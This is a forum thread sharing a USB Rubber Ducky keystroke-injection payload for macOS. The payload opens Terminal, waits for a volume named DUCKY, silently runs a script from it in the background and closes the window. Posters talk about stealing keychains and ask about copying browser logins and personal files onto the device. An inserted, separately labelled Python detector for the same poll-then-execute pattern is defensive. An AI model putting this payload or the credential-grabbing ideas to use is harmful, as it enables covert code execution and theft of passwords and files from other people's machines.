Toreddo
Posted February 13, 2015

I created a pretty simple payload for Mac OS X; this is the fastest I could get it. You might want to play with some delays, but my decent Mac is running this just fine.

It basically types a while loop into the terminal that waits for a volume named DUCKY to mount by looking for file 'a', and then executes an SH script called 'a' (the same file). This is done to make it as short as possible.

```
REM Open Spotlight and launch Terminal
DELAY 3000
COMMAND SPACE
DELAY 200
STRING terminal
ENTER
DELAY 200
REM Wait for /Volumes/DUCKY/a to appear, then run it in the background
STRING while [ ! -f /Volumes/DUCKY/a ] ; do sleep 2 ; done && sh /Volumes/DUCKY/a &
ENTER
REM Detach the background job from the shell, then close Terminal
STRING disown
ENTER
STRING exit
ENTER
COMMAND Q
```

So in your 'a' file you can write a shell script of any length you want; it will all execute in the background.

P.S. I just stole my own keychain, are there any more interesting things I could try to steal?
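Added example (not part of the original thread or written by its posters): a defender's check for the pattern in the post above, run over shell history or process command lines, that flags a loop waiting for a file under /Volumes and then running that same file. The function names, severity labels and sample lines are constructed for illustration, and it assumes the shell kept its history.

```python
import re

# Shell interpreter run directly on a script stored under /Volumes.
EXEC_FROM_VOLUME = re.compile(
    r"(?:^|[\s;&|(])(?:/bin/)?(?:sh|bash|zsh|ksh|dash)\s+(?:-\w+\s+)*['\"]?"
    r"(/Volumes/[^\s;&|'\"]+)")
# while/until loop that keeps testing for a path under /Volumes.
POLL_FOR_VOLUME = re.compile(
    r"\b(?:while|until)\b[^;]*?(?:\[\[?|test)\s[^;\]]*?-[defrs]\s+['\"]?"
    r"(/Volumes/[^\s;\]'\"]+)")
DETACHED = re.compile(r"\bdisown\b|\bnohup\b|&\s*$")
ZSH_EXTENDED = re.compile(r"^: \d+:\d+;")  # zsh EXTENDED_HISTORY timestamp prefix

def classify(line):
    """Return a finding dict for one command line, or None if nothing matches."""
    cmd = ZSH_EXTENDED.sub("", line.strip())
    polled = {m.group(1) for m in POLL_FOR_VOLUME.finditer(cmd)}
    executed = {m.group(1) for m in EXEC_FROM_VOLUME.finditer(cmd)}
    if not polled and not executed:
        return None
    if polled & executed:
        severity = "high"      # waits for a file, then runs that same file
    elif executed:
        severity = "medium"    # runs a script straight off a mounted volume
    else:
        severity = "low"       # only waits for a volume (common in backup jobs)
    return {"severity": severity, "paths": sorted(polled | executed),
            "detached": bool(DETACHED.search(cmd))}

def scan(lines):
    """Return (line_number, finding) for every matching line."""
    return [(n, f) for n, line in enumerate(lines, 1) if (f := classify(line))]

# Constructed sample history; line 2 is the loop quoted in the post above.
SAMPLE_HISTORY = [
    "cd ~/Projects",
    ": 1423831200:0;while [ ! -f /Volumes/DUCKY/a ] ; do sleep 2 ; done && sh /Volumes/DUCKY/a &",
    "disown",
    "bash /Volumes/Installer/setup.sh",
    "cp notes.sh /Volumes/Backup/",
    "while [ ! -d /Volumes/Backup ]; do sleep 5; done; rsync -a ~/Documents /Volumes/Backup/",
]

if __name__ == "__main__":
    for n, finding in scan(SAMPLE_HISTORY):
        print(n, finding)
```

The rules key on the behaviour (poll, then execute from the same mounted path) rather than on the volume label, since the label in the post is arbitrary.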
jujubes
Posted September 25, 2015

This looks interesting, do you think it's the best approach? Have you figured out more since? I'm definitely going to test this out and see how it works. Thanks for sharing!

How would you go about the keychain copying? I'd like to attempt the same, and maybe also experiment with grabbing the active User / Documents / Photo Library / Movies directories and copying them to the Ducky USB mounted section, maybe even the Chrome and Firefox favorites, stored logins, etc. Basically like a super-backup saving feature for dire situations.